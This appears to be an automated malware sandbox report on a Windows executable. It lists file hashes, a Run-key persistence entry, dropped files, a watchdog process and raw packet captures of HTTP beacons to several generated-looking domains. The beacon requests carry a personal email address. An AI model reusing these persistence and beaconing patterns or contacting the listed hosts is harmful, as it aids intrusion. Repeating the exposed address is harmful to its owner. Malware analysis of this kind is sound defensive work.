Analysis Date2014-09-19 03:55:43

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 141c5e4e57f73e38ff77c2875318bc8d sha1: 0abb59e8a9d9ef4fceea6779d42dc3d54235ef5a size: 293888
Section.rdata md5: 7de70dade6f60c24e7aeaa9170fa79dd sha1: b82706c096f2c59cde97dc50ac6690768aa4fc25 size: 34304 md5: 3612553368e3ccd0686c664306668df7 sha1: 3d6f91724b16b551a7400962f9b2dfaa63b9d658 size: 97792
Timestamp2014-07-24 05:01:34
PackerMicrosoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Device Isolation Manager Publication Software ➝
C:\Documents and Settings\Administrator\Application Data\pvzgoeiil\xcwfkmmhgtk.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\pvzgoeiil\xcwfkmmhgtk.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\pvzgoeiil\xcwfkmmhgtk.exe

↳ C:\Documents and Settings\Administrator\Application Data\pvzgoeiil\xcwfkmmhgtk.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\pvzgoeiil\xcwfkmmhgtk.rim
Creates FileC:\Documents and Settings\Administrator\Application Data\pvzgoeiil\diraqgcu.exe
Creates File\Device\Afd\Endpoint
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\pvzgoeiil\xcwfkmmhgtk.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\pvzgoeiil\xcwfkmmhgtk.exe"

Network Details:
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Flows TCP192.168.1.1:1031 ➝
Flows TCP192.168.1.1:1032 ➝
Flows TCP192.168.1.1:1033 ➝
Flows TCP192.168.1.1:1034 ➝
Flows TCP192.168.1.1:1035 ➝
Flows TCP192.168.1.1:1036 ➝
Flows TCP192.168.1.1:1037 ➝
Flows TCP192.168.1.1:1038 ➝
Flows TCP192.168.1.1:1039 ➝
Flows TCP192.168.1.1:1040 ➝

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d64706f 796c6540 776f726c   mail=dpoyle@worl
0x00000020 (00032)   646e6574 2e617474 2e6e6574 266d6574
0x00000030 (00048)   686f643d 706f7374 20485454 502f312e   hod=post HTTP/1.
0x00000040 (00064)   300d0a41 63636570 743a202a 2f2a0d0a   0..Accept: */*..
0x00000050 (00080)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000060 (00096)   650d0a48 6f73743a 20746869 6e6b6265   e..Host: thinkbe
0x00000070 (00112)   796f6e64 2e6e6574 0d0a0d0a  

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d64706f 796c6540 776f726c   mail=dpoyle@worl
0x00000020 (00032)   646e6574 2e617474 2e6e6574 266d6574
0x00000030 (00048)   686f643d 706f7374 20485454 502f312e   hod=post HTTP/1.
0x00000040 (00064)   300d0a41 63636570 743a202a 2f2a0d0a   0..Accept: */*..
0x00000050 (00080)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000060 (00096)   650d0a48 6f73743a 20707265 73656e74   e..Host: present
0x00000070 (00112)   6265696e 672e6e65 740d0a0d 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d64706f 796c6540 776f726c   mail=dpoyle@worl
0x00000020 (00032)   646e6574 2e617474 2e6e6574 266d6574
0x00000030 (00048)   686f643d 706f7374 20485454 502f312e   hod=post HTTP/1.
0x00000040 (00064)   300d0a41 63636570 743a202a 2f2a0d0a   0..Accept: */*..
0x00000050 (00080)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000060 (00096)   650d0a48 6f73743a 20636869 65666265   e..Host: chiefbe
0x00000070 (00112)   696e672e 6e65740d 0a0d0a0d 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d64706f 796c6540 776f726c   mail=dpoyle@worl
0x00000020 (00032)   646e6574 2e617474 2e6e6574 266d6574
0x00000030 (00048)   686f643d 706f7374 20485454 502f312e   hod=post HTTP/1.
0x00000040 (00064)   300d0a41 63636570 743a202a 2f2a0d0a   0..Accept: */*..
0x00000050 (00080)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000060 (00096)   650d0a48 6f73743a 20747765 6c766566   e..Host: twelvef
0x00000070 (00112)   6f726576 65722e6e 65740d0a 0d0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d64706f 796c6540 776f726c   mail=dpoyle@worl
0x00000020 (00032)   646e6574 2e617474 2e6e6574 266d6574
0x00000030 (00048)   686f643d 706f7374 20485454 502f312e   hod=post HTTP/1.
0x00000040 (00064)   300d0a41 63636570 743a202a 2f2a0d0a   0..Accept: */*..
0x00000050 (00080)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000060 (00096)   650d0a48 6f73743a 20686973 746f7279   e..Host: history
0x00000070 (00112)   666f7265 7665722e 6e65740d 0a0d0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d64706f 796c6540 776f726c   mail=dpoyle@worl
0x00000020 (00032)   646e6574 2e617474 2e6e6574 266d6574
0x00000030 (00048)   686f643d 706f7374 20485454 502f312e   hod=post HTTP/1.
0x00000040 (00064)   300d0a41 63636570 743a202a 2f2a0d0a   0..Accept: */*..
0x00000050 (00080)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000060 (00096)   650d0a48 6f73743a 20776561 74686572   e..Host: weather
0x00000070 (00112)   666f7265 7665722e 6e65740d 0a0d0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d64706f 796c6540 776f726c   mail=dpoyle@worl
0x00000020 (00032)   646e6574 2e617474 2e6e6574 266d6574
0x00000030 (00048)   686f643d 706f7374 20485454 502f312e   hod=post HTTP/1.
0x00000040 (00064)   300d0a41 63636570 743a202a 2f2a0d0a   0..Accept: */*..
0x00000050 (00080)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000060 (00096)   650d0a48 6f73743a 20636c61 73736265   e..Host: classbe
0x00000070 (00112)   796f6e64 2e6e6574 0d0a0d0a 0a0d0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d64706f 796c6540 776f726c   mail=dpoyle@worl
0x00000020 (00032)   646e6574 2e617474 2e6e6574 266d6574
0x00000030 (00048)   686f643d 706f7374 20485454 502f312e   hod=post HTTP/1.
0x00000040 (00064)   300d0a41 63636570 743a202a 2f2a0d0a   0..Accept: */*..
0x00000050 (00080)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000060 (00096)   650d0a48 6f73743a 20746869 6e6b666c   e..Host: thinkfl
0x00000070 (00112)   6f776572 2e6e6574 0d0a0d0a 0a0d0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d64706f 796c6540 776f726c   mail=dpoyle@worl
0x00000020 (00032)   646e6574 2e617474 2e6e6574 266d6574
0x00000030 (00048)   686f643d 706f7374 20485454 502f312e   hod=post HTTP/1.
0x00000040 (00064)   300d0a41 63636570 743a202a 2f2a0d0a   0..Accept: */*..
0x00000050 (00080)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000060 (00096)   650d0a48 6f73743a 20707265 73656e74   e..Host: present
0x00000070 (00112)   666c6f77 65722e6e 65740d0a 0d0a0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d64706f 796c6540 776f726c   mail=dpoyle@worl
0x00000020 (00032)   646e6574 2e617474 2e6e6574 266d6574
0x00000030 (00048)   686f643d 706f7374 20485454 502f312e   hod=post HTTP/1.
0x00000040 (00064)   300d0a41 63636570 743a202a 2f2a0d0a   0..Accept: */*..
0x00000050 (00080)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000060 (00096)   650d0a48 6f73743a 20636f6c 6c656765   e..Host: college
0x00000070 (00112)   636f726e 65722e6e 65740d0a 0d0a0a

